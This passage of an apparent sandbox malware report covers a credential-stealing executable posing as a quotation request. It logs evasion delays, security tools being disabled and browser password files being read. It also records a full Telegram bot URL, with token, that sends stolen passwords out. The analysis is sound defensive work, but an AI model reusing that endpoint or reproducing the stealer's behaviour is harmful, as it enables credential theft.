            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596152s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -596046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595827s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595607s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595170s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -594624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596152Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595827Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595607Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595170Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594624Jump to behavior
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C83000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeAPI call chain: ExitProcess graph end nodegraph_0-4796
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeAPI call chain: ExitProcess graph end nodegraph_0-4800
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess created: C:\Users\user\Desktop\Request for Quotation New collaboration.exe "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation New collaboration.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Request for Quotation New collaboration.exe PID: 2556, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Request for Quotation New collaboration.exe PID: 2556, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Request for Quotation New collaboration.exe PID: 2556, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Request for Quotation New collaboration.exe PID: 2556, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Request for Quotation New collaboration.exe PID: 2556, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Request for Quotation New collaboration.exe53%ReversingLabs
            Request for Quotation New collaboration.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.33
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.228false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comRequest for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://translate.google.com/translate_a/element.jsRequest for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org/qRequest for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004CE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035258000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.com/0Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://reallyfreegeoip.orgRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/Request for Quotation New collaboration.exe, 00000005.00000003.2175621222.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003521F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comRequest for Quotation New collaboration.exe, 00000005.00000003.2120761276.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000003.2120825216.0000000004C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorRequest for Quotation New collaboration.exefalse
                                                            high
                                                            http://api.telegram.orgRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035547000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.000000003542D000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000353D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.org/eRequest for Quotation New collaboration.exe, 00000005.00000002.2814067949.0000000004CE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000351C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.0000000035240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    172.217.19.174
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.181.33
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.67.177.134
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    132.226.247.73
                                                                    checkip.dyndns.comUnited States
                                                                    16989UTMEMUSfalse
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1571272
                                                                    Start date and time:2024-12-09 08:30:19 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 11s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Request for Quotation New collaboration.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 113
                                                                    • Number of non-executed functions: 114
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: Request for Quotation New collaboration.exe
                                                                    TimeTypeDescription
                                                                    02:32:50API Interceptor546x Sleep call for process: Request for Quotation New collaboration.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      file.exeGet hashmaliciousBlank GrabberBrowse
                                                                        Solara.exeGet hashmaliciousUnknownBrowse
                                                                          spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                            2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                              BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                    INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                        172.67.177.134INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                      ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            132.226.247.73Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            dekontu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
